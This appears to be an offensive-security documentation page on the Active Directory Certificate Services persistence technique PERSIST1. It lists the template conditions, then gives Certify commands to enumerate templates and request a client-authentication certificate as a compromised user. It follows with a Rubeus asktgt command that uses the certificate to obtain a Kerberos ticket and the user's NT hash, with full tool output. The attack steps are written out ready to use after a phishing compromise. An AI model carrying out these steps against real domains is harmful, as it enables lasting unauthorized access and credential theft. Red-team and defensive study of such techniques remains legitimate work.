Skip to main content
PERSIST1 is a technique used to extend initial access to a user into persistent access by requesting a client authentication certificate in the context of the user account, which can be used for future authentication as the user account. If, for example, a phishing attack is successful and access is obtained as a user for which the credentials are unknown, persistent access to that user can be obtained through certificates.

Template Requirements

According to Certified Pre-Owned, a suitable certificate template must meet these criteria:
The enterprise CA grants enrollment rights to the user account. Otherwise, the account would be unable to request any certificates from the CA.
The certificate template grants enrollment rights to the user account. Otherwise, the account would be unable to request certificates based on the specific template.
The “manager approval” feature is disabled for the certificate template. Otherwise, a “CA Manager” would have to manually review and approve the certificate request.
The “authorized signature” feature is disabled for the certificate template. Otherwise, an enrollment agent would need to sign the certificate request on behalf of the requester.
The certificate template defines an Extended Key Usage (EKU) that enables client authentication:
  • Client Authentication (1.3.6.1.5.5.7.3.2)
  • PKINIT Client Authentication (1.3.6.1.5.2.3.4)
  • Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
  • Any Purpose (2.5.29.37.0)
  • Subordinate CA (No EKUs)

Enumeration

We can search for certificate templates with these conditions using the enum-templates --filter-client-auth command from Certify. 
Certify.exe enum-templates --filter-enabled --filter-client-auth --hide-admins
Use --filter-enabled to only show templates published by a CA and --hide-admins to reduce noise in the output.
Once we have identified a suitable certificate template that the user account can enroll in, we can request a certificate based on the template using the request command from Certify. 
> Certify.exe request --ca ca01.corp.local\CORP-CA01-CA --template User

   _____          _   _  __
  / ____|        | | (_)/ _|
 | |     ___ _ __| |_ _| |_ _   _
 | |    / _ \ '__| __| |  _| | | |
 | |___|  __/ |  | |_| | | | |_| |
  \_____\___|_|   \__|_|_|  \__, |
                             __/ |
                            |___./
  v2.0.0

[*] Action: Request a certificate

[*] Current user context    : CORP\lowpriv
[*] No subject name specified, using current context as subject.

[*] Template                : User
[*] Subject                 : CN=lowpriv, OU=Users, OU=Corp, DC=corp, DC=local

[*] Certificate Authority   : ca01.corp.local\CORP-CA01-CA
[*] CA Response             : The certificate has been issued.
[*] Request ID              : 1

[*] Certificate (PFX)       :

MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+gwgDCABgkqh...

Certify completed in 00:00:04.3614718
When the certificate has been issued, it can be used to persistently authenticate as the user account using the asktgt command from Rubeus. We can also use the /getcredentials parameter to request a U2U service ticket and retrieve the password NT hash for the user account. 
> Rubeus.exe asktgt /user:lowpriv /certificate:MIACAQMwgAYJKoZIhvcNAQcBoIAkgASCA+gwgDCABgkqh... /getcredentials

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.0.2

[*] Action: Ask TGT

[*] Using PKINIT with etype rc4_hmac and subject: E=lowpriv@corp.local, CN=lowpriv, OU=Users, OU=Corp, DC=corp, DC=local
[*] Building AS-REQ (w/ PKINIT preauth) for: 'corp.local\lowpriv'
[*] Using domain controller: 10.10.10.10:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIGHjCCBhqgAwIBBaEDAgEWooIFMTCCBS1hggUpMIIFJaADAgEFoQ8bDU1FR0FLRUsuTE9DQUyiIjAg
      ...

  ServiceName              :  krbtgt/corp.local
  ServiceRealm             :  CORP.LOCAL
  UserName                 :  lowpriv
  UserRealm                :  CORP.LOCAL
  StartTime                :  30/06/2025 15.16.52
  EndTime                  :  01/07/2025 01.16.52
  RenewTill                :  07/07/2025 15.16.52
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  AFXzq5Bai41JhCj70jrfyA==
  ASREP (key)              :  D4F939DAB9C7B93717EB048B0F0F5F5C

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
+      NTLM              : 31D6CFE0D16AE931B73C59D7E0C089C0
The issued certificate will be able to authenticate for as long as is mentioned in the Validity Period attribute of the certificate template. In order to extend the persistence period, you need to abuse PERSIST3 - Account Persistence via Certificate Renewal.